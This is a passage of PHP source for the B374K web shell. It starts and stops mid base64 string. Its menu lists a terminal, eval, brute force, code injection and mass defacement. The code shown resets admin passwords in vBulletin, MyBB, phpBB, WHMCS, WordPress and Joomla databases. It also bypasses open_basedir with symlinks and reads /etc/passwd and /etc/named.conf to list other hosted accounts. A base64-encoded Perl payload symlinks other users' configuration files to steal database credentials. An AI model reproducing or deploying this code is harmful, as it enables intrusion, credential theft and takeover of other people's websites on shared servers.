Ee7LFcxrLXMsUBeZB2c5+6xPi26rE+vPwewftDwTKqr4zuM6Yo6qusf66f1z8c6c46levgXrTWXEPLtOVHdkKENVWBjxb7/uzdxcYWTFU+xvhu2+ajlzAr72IUum6pZ6/TbwlLnDvFVk8WaZmRwM2Jjwn/Qldz9fbcn64DprAI3nc+U210wc4yryEGwWYTrkH0Dw==';
;echo '<html>
<head>
<title>B374K - ';echo $xName;;echo ' (Priv8)</title>
<link href=\'http://g1204.hizliresim.com/w/6/452h7.png\' rel=\'shortcut icon\'/>
<script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = \'none\'; document.getElementById(baru).style.display = \'block\'; } </script>
<style type="text/css">
';echo gzinflate(base64_decode($style));;echo '</style>
</head>
<div class="main">
<!-- head info start here -->
<div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">B<span class="b2">374</span>K</span></a></td></tr><tr><td><span class="gaya">r00t@';echo $xName;;echo ':~$<br>';echo $xTeam;;echo '</span></td></tr></table></td> <td>';echo $buff;;echo '</td> </tr></table> </div>
<!-- head info end here -->
<!-- menu start -->
<div id="menu">
<a href="?';echo 'y='.$pwd;;echo '">r00t</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=shell">terminal</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=php">Eval</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=mysql">Mysql</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=netsploit">Netsploit</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=mail">Mail</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=brute">Bruteforce</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=Code">Code Injector</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=sym">Symlink</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=reset">Reset</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=mass">Zone-h</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=reverse">Reverse-ip</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=about">Credit</a>
<a href="?';echo 'y='.$pwd;;echo '&amp;x=out">Logout</a>
</div>
<!-- menu end -->
		';
if(isset($_GET['x']) &&($_GET['x'] == 'out')) {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo 'See You Soon :)';
}
elseif(isset($_GET['x']) &&($_GET['x'] == 'reset'))
{
;echo '	<form action="?y=';echo $pwd;;echo '&amp;x=reset" method="post">
	';
echo'<center><pre>
</pre></center>';
echo "<br><br><center><form method=POST action''><input class='inputzbut' type=submit name=vbulletin value='vBulletin'><input class='inputzbut' type=submit name=mybb value='MyBB'><input class='inputzbut' type=submit name=phpbb value='phpBB'><input class='inputzbut' type=submit name=whmcs value='WHMCS'><input class='inputzbut' type=submit name=wordpress value='WordPress'><input class='inputzbut' type=submit name=joomla value='Joomla'></form><p>Coded By MrAtoms</center>";
if (isset($_POST['vbulletin']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>Change vBulletin Info<br>Patch Control Panel : [patch]/admincp<br>Path Config : [patch]/includes/config.php<br>includes/init.php </font>
<font face='Arial' color='#FF0000'>>></font><font face='Arial' color='#000000'> includes/class_core.php </font>
<font face='Arial' color='#FF0000'>>></font><font face='Arial' color='#000000'> includes/config.php</font></center>
    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost class='inputz' type=text name=dbhvb size='50' ><br>
          <font face='Arial' color='#000000'>DB name<br></font><input class='inputz' type=text name=dbnvb size='50' ><br>
          <font face='Arial' color='#000000'>DB user<br></font><input class='inputz' type=text name=dbuvb size='50' ><br>
          <font face='Arial' color='#000000'>DB password<br></font><input class='inputz' type=password name=dbpvb size='50' ><br>
          <font face='Arial' color='#000000'>Table prefix<br></font><input class='inputz' type=text name=prvb size='50' ><br>
          <font face='Arial' color='#000000'>User admin<br></font><input class='inputz' type=text name=urvb size='50' ><br>
          <font face='Arial' color='#000000'>New password admin<br></font><input class='inputz' type=password name=psvb size='50' ><br>
          <font face='Arial' color='#000000'>New E-mail admin<br></font><input class='inputz' type=text name=emvb size='50' ><br><br>
          <input type=submit value='Change' class='inputzbut' ><br>
          </form></center></td></tr></table></center>";
}else{
$dbhvb = $_POST['dbhvb'];
$dbnvb  = $_POST['dbnvb'];
$dbuvb = $_POST['dbuvb'];
$dbpvb  = $_POST['dbpvb'];
@mysql_connect($dbhvb,$dbuvb,$dbpvb);
@mysql_select_db($dbnvb);
$urvb=str_replace("\'","'",$urvb);
$set_urvb = $_POST['urvb'];
$psvb=str_replace("\'","'",$psvb);
$pass_vb = $_POST['psvb'];
$emvb=str_replace("\'","'",$emvb);
$set_emvb = $_POST['emvb'];
$vb_prefix = $_POST['prvb'];
$table_name = $vb_prefix.'user';
$query = 'select * from '.$table_name .' where username="'.$set_urvb .'";';
$result = mysql_query($query);
$row = mysql_fetch_array($result);
$salt = $row['salt'];
$pass2 = md5($pass_vb);
$pass =$pass2 .$salt;
$set_pssalt = md5($pass);
$tiger1 = 'UPDATE '.$table_name .' SET password="'.$set_pssalt .'" WHERE username="'.$set_urvb .'";';
$tiger2 = 'UPDATE '.$table_name .' SET email="'.$set_emvb .'" WHERE username="'.$set_urvb .'";';
$ok1=@mysql_query($tiger1);
$ok1=@mysql_query($tiger2);
if($ok1){
echo "<script>alert('vBulletin Info Changed ;)');</script>";
}
}
if (isset($_POST['mybb']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>Change MyBB Info<br>Patch Control Panel : [patch]/admin<br>Path Config : [patch]/inc/config.php</font></center>
    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost class='inputz' type=text name=dbhmy size='50' ><br>
          <font face='Arial' color='#000000'>DB name<br></font><input class='inputz' type=text name=dbnmy size='50' ><br>
          <font face='Arial' color='#000000'>DB user<br></font><input class='inputz' type=text name=dbumy size='50' ><br>
          <font face='Arial' color='#000000'>DB password<br></font><input class='inputz' type=password name=dbpmy size='50' ><br>
          <font face='Arial' color='#000000'>Change user admin<br></font><input class='inputz' type=text name=urmy size='50' ><br>
          <font face='Arial' color='#000000'>Change E-mail admin<br></font><input class='inputz' type=text name=emmy size='50' ><br>
          <font face='Arial' color='#000000'>Table prefix<br></font><input class='inputz' value='mybb_' type=text name=prmy size='50' ><br><br>
          <input type=submit value='Change' class='inputzbut' ></form></center></td></tr></table></center>";
}else{
$dbhmy = $_POST['dbhmy'];
$dbnmy  = $_POST['dbnmy'];
$dbumy = $_POST['dbumy'];
$dbpmy  = $_POST['dbpmy'];
@mysql_connect($dbhmy,$dbumy,$dbpmy);
@mysql_select_db($dbnmy);
$urmy=str_replace("\'","'",$urmy);
$set_urmy = $_POST['urmy'];
$emmy=str_replace("\'","'",$emmy);
$set_emmy = $_POST['emmy'];
$my_prefix = $_POST['prmy'];
$table_name1 = $my_prefix.'users';
$tiger3 = "UPDATE $table_name1 SET username ='".$set_urmy."' WHERE uid ='1'";
$tiger4 = "UPDATE $table_name1 SET email ='".$set_emmy."' WHERE uid ='1'";
$ok2=@mysql_query($tiger3);
$ok2=@mysql_query($tiger4);
if($ok2){
echo "<script>alert('MyBB Info Changed ;)');</script>";
}
}
if (isset($_POST['phpbb']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>Change phpBB Info<br>Patch Control Panel : [patch]/adm<br>Path Config : [patch]/config.php</font></center>
    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost class='inputz' type=text name=dbhphp size='50' ><br>
          <font face='Arial' color='#000000'>DB name<br></font><input class='inputz' type=text name=dbnphp size='50' ><br>
          <font face='Arial' color='#000000'>DB user<br></font><input class='inputz' type=text name=dbuphp size='50' ><br>
          <font face='Arial' color='#000000'>DB password<br></font><input class='inputz' type=password name=dbpphp size='50' ><br>
          <font face='Arial' color='#000000'>Change user admin<br></font><input class='inputz' type=text name=urphp size='50' ><br>
          <font face='Arial' color='#000000'>Change password admin<br></font><input class='inputz' type=password name=psphp size='50' ><br>
          <font face='Arial' color='#000000'>Table prefix<br></font><input class='inputz' value=phpbb_ type=text name=prphp size='50' ><br><br>
          <input type=submit value='Change' class='inputzbut' ></form></center></td></tr></table></center>";
}else{
$dbhphp = $_POST['dbhphp'];
$dbnphp  = $_POST['dbnphp'];
$dbuphp = $_POST['dbuphp'];
$dbpphp  = $_POST['dbpphp'];
@mysql_connect($dbhphp,$dbuphp,$dbpphp);
@mysql_select_db($dbnphp);
$urphp=str_replace("\'","'",$urphp);
$set_urphp = $_POST['urphp'];
$psphp=str_replace("\'","'",$psphp);
$pass_php = $_POST['psphp'];
$set_psphp = md5($pass_php);
$php_prefix = $_POST['prphp'];
$table_name2 = $php_prefix.'users';
$tiger5 = "UPDATE $table_name2 SET username_clean ='".$set_urphp."' WHERE user_id ='2'";
$tiger6 = "UPDATE $table_name2 SET user_password ='".$set_psphp."' WHERE user_id ='2'";
$ok3=@mysql_query($tiger5);
$ok3=@mysql_query($tiger6);
if($ok3){
echo "<script>alert('phpBB Info Changed ;)');</script>";
}
}
if (isset($_POST['whmcs']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>Change WHMCS Info<br>Patch Control Panel : [patch]/admin<br>Path Config : [patch]/configuration.php</font></center>
    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost type=text name=dbhwhm size='50' class='inputz' ><br>
          <font face='Arial' color='#000000'>DB name<br></font><input type=text name=dbnwhm size='50' class='inputz' ><br>
          <font face='Arial' color='#000000'>DB user<br></font><input type=text name=dbuwhm size='50' class='inputz' ><br>
          <font face='Arial' color='#000000'>DB password<br></font><input type=password name=dbpwhm size='50' class='inputz' ><br>
          <font face='Arial' color='#000000'>Change user admin<br></font><input type=text name=urwhm size='50' class='inputz' ><br>
          <font face='Arial' color='#000000'>Change password admin<br></font><input type=password name=pswhm size='50' class='inputz' ><br><br>
          <input type=submit value='Change' class='inputzbut' ></form></center></td></tr></table></center>";
}else{
$dbhwhm = $_POST['dbhwhm'];
$dbnwhm  = $_POST['dbnwhm'];
$dbuwhm = $_POST['dbuwhm'];
$dbpwhm  = $_POST['dbpwhm'];
@mysql_connect($dbhwhm,$dbuwhm,$dbpwhm);
@mysql_select_db($dbnwhm);
$urwhm=str_replace("\'","'",$urwhm);
$set_urwhm = $_POST['urwhm'];
$pswhm=str_replace("\'","'",$pswhm);
$pass_whm = $_POST['pswhm'];
$set_pswhm = md5($pass_whm);
$tiger9 = "UPDATE tbladmins SET username ='".$set_urwhm."' WHERE id ='1'";
$tiger10 = "UPDATE tbladmins SET password ='".$set_pswhm."' WHERE id ='1'";
$ok5=@mysql_query($tiger9);
$ok5=@mysql_query($tiger10);
if($ok5){
echo "<script>alert('WHMCS Info Changed ;)');</script>";
}
}
if (isset($_POST['wordpress']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>Change WordPress Info<br> Patch Control Panel : [patch]/wp-admin<br> Path Config : [patch]/wp-config.php<br></font></center>
     <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost type=text name=dbhwp size='50' class='inputz'><br>
        <font face='Arial' color='#000000'>DB name<br></font><input type=text name=dbnwp size='50' class='inputz'><br>
        <font face='Arial' color='#000000'>DB user<br></font><input type=text name=dbuwp size='50' class='inputz'><br>
        <font face='Arial' color='#000000'>DB password<br></font><input type=password name=dbpwp size='50' class='inputz'><br>
        <font face='Arial' color='#000000'>Change user admin<br></font><input type=text name=urwp size='50' class='inputz'><br>
        <font face='Arial' color='#000000'>Change password admin<br></font><input type=password name=pswp size='50' class='inputz'><br>
        <font face='Arial' color='#000000'>Table prefix<br></font><input value=wp_ type=text name=prwp size='50' class='inputz'><br>
        <input type=submit value='Change' class='inputzbut' ></form></center></td></tr></table></center>";
}else{
$dbhwp = $_POST['dbhwp'];
$dbnwp  = $_POST['dbnwp'];
$dbuwp = $_POST['dbuwp'];
$dbpwp  = $_POST['dbpwp'];
@mysql_connect($dbhwp,$dbuwp,$dbpwp);
@mysql_select_db($dbnwp);
$urwp=str_replace("\'","'",$urwp);
$set_urwp = $_POST['urwp'];
$pswp=str_replace("\'","'",$pswp);
$pass_wp = $_POST['pswp'];
$set_pswp = md5($pass_wp);
$wp_prefix = $_POST['prwp'];
$table_name4 = $wp_prefix.'users';
$tiger11 = "UPDATE $table_name4 SET user_login ='".$set_urwp."' WHERE ID ='1'";
$tiger12 = "UPDATE $table_name4 SET user_pass ='".$set_pswp."' WHERE ID ='1'";
$ok6=@mysql_query($tiger11);
$ok6=@mysql_query($tiger12);
if($ok6){
echo "<script>alert('WordPress Info Changed ;)');</script>";
}
}
if (isset($_POST['joomla']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>Change Joomla Info<br>Patch Control Panel : [patch]/administrator<br>Path Config : [patch]/configuration.php</font></center>
    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost class='inputz' type=text name=dbhjos size='50'><br>
          <font face='Arial' color='#000000'>DB name<br></font><input class='inputz' type=text name=dbnjos size='50'><br>
          <font face='Arial' color='#000000'>DB user<br></font><input class='inputz' type=text name=dbujos size='50'><br>
          <font face='Arial' color='#000000'>DB password<br></font><input class='inputz' type=password name=dbpjos size='50'><br>
          <font face='Arial' color='#000000'>Change user admin<br></font><input class='inputz' type=text name=urjos size='50'><br>
          <font face='Arial' color='#000000'>Change password admin<br></font><input class='inputz' type=password name=psjos size='50'><br>
          <font face='Arial' color='#000000'>Table prefix<br></font><input class='inputz' value=jos_ type=text name=prjos size='50'><br>
          <input type=submit value='Change' class='inputzbut'></form></center></td></tr></table></center>";
}else{
$dbhjos = $_POST['dbhjos'];
$dbnjos  = $_POST['dbnjos'];
$dbujos = $_POST['dbujos'];
$dbpjos  = $_POST['dbpjos'];
@mysql_connect($dbhjos,$dbujos,$dbpjos);
@mysql_select_db($dbnjos);
$urjos=str_replace("\'","'",$urjos);
$set_urjos = $_POST['urjos'];
$psjos=str_replace("\'","'",$psjos);
$pass_jos = $_POST['psjos'];
$set_psjos = md5($pass_jos);
$jos_prefix = $_POST['prjos'];
$table_name5 = $jos_prefix.'users';
$tiger13 = "UPDATE $table_name5 SET username ='".$set_urjos."' WHERE id ='62'";
$tiger14 = "UPDATE $table_name5 SET password ='".$set_psjos."' WHERE id ='62'";
$ok7=@mysql_query($tiger13);
$ok7=@mysql_query($tiger14);
if($ok7){
echo "<script>alert('Joomla Info Changed ;)');</script>";
}
}
}
elseif(isset($_GET['x']) &&($_GET['x'] == 'sym'))
{
;echo '	<form action="?y=';echo $pwd;;echo '&amp;x=sym" method="post">
	';
echo "<br><br><center>
<form method=POST action''>
<input class='inputzbut' type=submit name=1 value='Symlink'>
<input class='inputzbut' type=submit name=2 value='Symlink'>
<input class='inputzbut' type=submit name=3 value='Localdomain'>
<input class='inputzbut' type=submit name=4 value='Configweb'>
<input class='inputzbut' type=submit name=5 value='Jumping'>
</form></center>";
if (isset($_POST['1']))
{
$fakedir='cx';
$fakedep=16;
$num=0;
if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file='';
echo '<PRE><img src="http://1.bp.blogspot.com/-b8EqGk8iTBU/TmUKsjjoioI/AAAAAAAAAXc/NB3oVGXzGRY/s1600/ryu.png"><P>This Symlink tool compile by Ryuzaki <a
href="http://justryuz.blogspot.com/">Justryuz</a>.
<p>symlink open_basedir bypass
<p><form name="form"
 action="http://'.$_SERVER['HTTP_HOST'].htmlspecialchars($_SERVER['PHP_SELF']).'" method="post"><input class="inputzbut" type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input class="inputzbut" type="submit" name="hym" value="Create Symlink"></form>';
if(empty($file))
exit;
if(!is_writable('.'))
die('not writable directory');
$level=0;
for($as=0;$as<$fakedep;$as++){
if(!file_exists($fakedir))
mkdir($fakedir);
chdir($fakedir);
}
while(1<$as--) chdir('..');
$hardstyle = explode('/',$file);
for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$as++;
}
}
$as++;
while($as--)
chdir('..');
@rmdir('fakesymlink');
@unlink('fakesymlink');
@symlink(str_repeat($fakedir.'/',$fakedep),'fakesymlink');
while(1)
if(true==(@symlink('fakesymlink/'.str_repeat('../',$fakedep-1).$file,'symlink'.$num))) break;
else $num++;
@unlink('fakesymlink');
mkdir('fakesymlink');
die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
}
if (isset($_POST['2']))
{
echo '<center>';
@mkdir('sym_',0777);
$hdt  = "Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nRequire None\nSatisfy Any";
$hfp =@fopen ('sym/.htaccess','w');
fwrite($hfp ,$hdt);
if(function_exists('symlink')) {
@symlink('/','sym_/root');
}
$d0mains = @file('/etc/named.conf');
if(!$d0mains) {
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
echo "<table align='center' width='40%' ><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
$dt = file('/etc/passwd');
$l=0;
foreach($dt as $d) {
$r = explode(':',$d);
if(strpos($r[5],'home')) {
echo '<tr'.($l?' class=l1':'').'><td>'.$j.'</td><td>---</td><td>'.$r[0]."</td><td><a href='sym_/root".$r[5]."/public_html' target='_blank'>symlink</a></td></tr>";
$l=$l?0:1;
$j++;
}
}
echo '</table>';
}else {
echo '<table border=1 bordercolor=#4C83AF ><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>';
$count=1;
$mck = array();
foreach($d0mains as $d0main){
if(@eregi('zone',$d0main)){
preg_match_all('#zone "(.*)"#',$d0main,$domain);
flush();
if(strlen(trim($domain[1][0])) >2){
$mck[] = $domain[1][0];
}
}
}
$mck = array_unique($mck);
$usr = array();
$dmn = array();
foreach($mck as $o) {
$infos = @posix_getpwuid(fileowner('/etc/valiases/'.$o));
$usr[] = $infos['name'];
$dmn[] = $o;
}
array_multisort($usr,$dmn);
$dt = file('/etc/passwd');
$passwd = array();
foreach($dt as $d) {
$r = explode(':',$d);
if(strpos($r[5],'home')) {
$passwd[$r[0]] = $r[5];
}
}
$l=0;
$j=1;
foreach($usr as $r) {
echo '<tr'.($l?' class=l1':'').'><td>'.$count++."</td>
                                                 <td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td>
                                                 <td>'.$r."</td>
                                                 <td><a href='sym_/root".$passwd[$r]."/public_html' target='_blank'>symlink</a></td></tr>";
flush();
$l=$l?0:1;
$j++;
}
echo '</table>';
}
echo '</center>';
}
if (isset($_POST['3']))
{
echo '<center>';
$d0mains = @file('/etc/named.conf');
if(!$d0mains){
echo "<pre style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
}else {
echo '<table  border=1 bordercolor=#4C83AF ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>';
$unk = array();
foreach($d0mains as $d0main){
if(@eregi('zone',$d0main)){
preg_match_all('#zone "(.*)"#',$d0main,$domains);
flush();
if(strlen(trim($domains[1][0])) >2){
$unk[] = $domains[1][0];
flush();
}
}
}
$count=1;
$unk = array_unique($unk);
$l=0;
foreach($unk as $d){
$user = posix_getpwuid(@fileowner('/etc/valiases/'.$d));
echo '<tr'.($l?' class=l1':'').'><td>'.$count.'</td><td><a href=http://'.$d.'/>'.$d.'</a></td><td>'.$user['name'].'</td></tr>';
flush();
$count++;
$l=$l?0:1;
}
echo '</table>';
}
echo '</center>';
}
if (isset($_POST['4']))
{
mkdir('web_',0755);
chdir('web_');
$file = '.htaccess';
$filez = "$file";
$filex = fopen ($filez ,'w') or die ('0.o?');
$file = 'Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .Dz
AddHandler cgi-script .Dz
AddHandler cgi-script .Dz';
fwrite( $filex ,$file ) ;
fclose($filex);
$config = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjxsaW5rIGhyZWY9Imh0dHA6Ly96b25lLWgub3JnL2ltYWdlcy9jZmxhZ3MvcG5nL215LnBuZyIgcmVsPSJzaG9ydGN1dCBpY29uIi8+DQo8dGl0bGU+Q29uZmlnIENoZWNrZXI8L3RpdGxlPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCi5keiB7DQogICAgZm9udC1mYW1pbHk6IFZlcmRhbmE7DQogICAgZm9udC1zaXplOiAxNXB4Ow0KICAgIGZvbnQtd2VpZ2h0OiBib2xkOw0KICAgIGNvbG9yOiByZWQ7DQogICAgdGV4dC1hbGlnbjogY2VudGVyOw0KICAgIHRleHQtc2hhZG93OiB3aGl0ZSAxcHggMHB4IDVweDsNCn0NCiNjaGVja291dHRleHRhcmVhIHsNCiAgICB3ZWJraXQtYm9yZGVyLXJhZGl1czogMTVweDsNCn0NCjpob3ZlciNjaGVja291dHRleHRhcmVhIHtvcGFjaXR5OiAwLjY7IGJhY2tncm91bmQtY29sb3I6MzMzMzMzfQ0KPC9zdHlsZT4NCjwvaGVhZD4NCic7DQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiRtc3IgPSBxeHtwd2R9Ow0KJGtvbGE9JG1zci4iLyIuJHVzZXI7DQoka29sYT1+cy9cbi8vZzsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC1vcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcC9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC1zaG9wcGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hbWVtYmVyL2NvbmZpZy5pbmMucGhwJywka29sYS4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlnLmluYy5waHAnLCRrb2xhLictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1tZW1iZXJzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRrb2xhLictMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWZvcnVtcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJy01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRrb2xhLictNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWd1cmUucGhwJywka29sYS4nLTEwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2luYy5waHAnLCRrb2xhLictMTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy13cC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9XUC93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtV1AudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3AvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtd3AtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1wcmVzcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLXdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9Xb3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtd29yZHByZXNzLWJldGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLXdwLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1ob21lLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Byb3RhbC93cC1jb25maWcucGhwJywka29sYS4nLXdwLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIu